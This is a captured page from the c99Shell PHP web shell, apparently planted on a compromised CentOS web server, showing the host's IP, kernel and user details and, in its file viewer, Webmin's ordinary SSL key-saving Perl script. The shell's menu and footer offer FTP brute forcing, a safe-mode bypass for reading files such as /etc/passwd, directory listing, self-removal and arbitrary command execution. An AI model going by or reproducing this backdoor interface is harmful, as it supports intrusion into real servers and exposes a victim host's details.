110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/webmin/ drwxr-xr-x Free 49.58 GB of 127.8 GB (38.8%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# Replace the existing Webmin SSL key

require './webmin-lib.pl';
&ReadParseMime();
&error_setup($text{'savekey_err'});

# Validate inputs
$key = $in{'key'} || $in{'keyfile'};
$key =~ s/\r//g;
$key =~ /BEGIN (RSA )?PRIVATE KEY/ &&
  $key =~ /END (RSA )?PRIVATE KEY/ || &error($text{'savekey_ekey'});
if (!$in{'cert_def'}) {
    # Make sure cert is valid
    $cert = $in{'cert'} || $in{'certfile'};
    $cert =~ s/\r//g;
    $cert =~ /BEGIN CERTIFICATE/ &&
      $cert =~ /END CERTIFICATE/ || &error($text{'savekey_ecert'});
    }
else {
    # Make sure key contains cert
    $key =~ /BEGIN CERTIFICATE/ &&
      $key =~ /END CERTIFICATE/ || &error($text{'savekey_ecert2'});
    }
if (!$in{'chain_def'}) {
    # Make sure chained cert is valid
    $chain = $in{'chain'} || $in{'chainfile'};
    $chain =~ s/\r//g;
    $chain =~ /BEGIN CERTIFICATE/ &&
      $chain =~ /END CERTIFICATE/ || &error($text{'savekey_echain'});
    }

# Save config and key file
&lock_file($ENV{'MINISERV_CONFIG'});
&get_miniserv_config(\%miniserv);
$miniserv{'keyfile'} ||= "$config_directory/miniserv.pem";
&lock_file($miniserv{'keyfile'});
&open_tempfile(KEY, ">$miniserv{'keyfile'}");
&print_tempfile(KEY, $key);
&close_tempfile(KEY);
&unlock_file($miniserv{'keyfile'});
if ($in{'cert_def'}) {
    delete($miniserv{'certfile'});
    }
else {
    $miniserv{'certfile'} ||= "$config_directory/miniserv.cert";
    &lock_file($miniserv{'certfile'});
    &open_tempfile(CERT, ">$miniserv{'certfile'}");
    &print_tempfile(CERT, $cert);
    &close_tempfile(CERT);
    &unlock_file($miniserv{'certfile'});
    }
if (!$in{'chain_def'}) {
    $miniserv{'extracas'} = "$config_directory/miniserv.chain"
        if (!$miniserv{'extracas'} || $miniserv{'extracas'} =~ /\s/);
    &lock_file($miniserv{'extracas'});
    &open_tempfile(CERT, ">$miniserv{'extracas'}");
    &print_tempfile(CERT, $chain);
    &close_tempfile(CERT);
    &unlock_file($miniserv{'extracas'});
    }
&put_miniserv_config(\%miniserv);
&unlock_file($ENV{'MINISERV_CONFIG'});

# If uploading a key from a CSR, remove the saved key
$csrkeydata = &read_file_contents("$config_directory/miniserv.newkey");
if (&strip_key_spaces($csrkeydata) eq &strip_key_spaces($key)) {
    &unlink_logged("$config_directory/miniserv.newkey");
    }

# Tell the user
&ui_print_header(undef, $text{'savekey_title'}, "");

if ($miniserv{'certfile'}) {
    print &text('savekey_done2', "<tt>$miniserv{'keyfile'}</tt>",
                     "<tt>$miniserv{'certfile'}</tt>"),"<p>\n";
    }
else {
    print &text('savekey_done', "<tt>$miniserv{'keyfile'}</tt>"),"<p>\n";
    }
if (!$in{'chain_def'}) {
    print &text('savekey_done3', "<tt>$miniserv{'extracas'}</tt>"),"<p>\n";
    }

&ui_print_footer("", $text{'index_return'});

&webmin_log("savekey");
&restart_miniserv(1);

# strip_key_spaces(data)
# Returns a key or cert with spaces removed and lowercased, for comparison
sub strip_key_spaces
{
my ($key) = @_;
$key =~ s/\s+//g;
$key = lc($key);
return $key;
}

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: